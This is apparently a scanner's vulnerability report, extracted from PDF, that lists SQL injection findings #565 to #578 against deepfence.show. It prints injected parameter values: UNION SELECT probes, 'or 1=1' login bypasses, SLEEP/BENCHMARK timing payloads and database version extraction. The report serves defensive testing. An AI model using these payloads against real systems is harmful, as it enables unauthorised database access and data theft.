href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #565\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #566\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io test%20UNION%20select%201,%20@@version,%201,\n%201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #567\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #568\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io admin') or ('1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #569\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #570\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #571\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #572\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #573Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #574\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #575\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #576\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #577\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #578\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 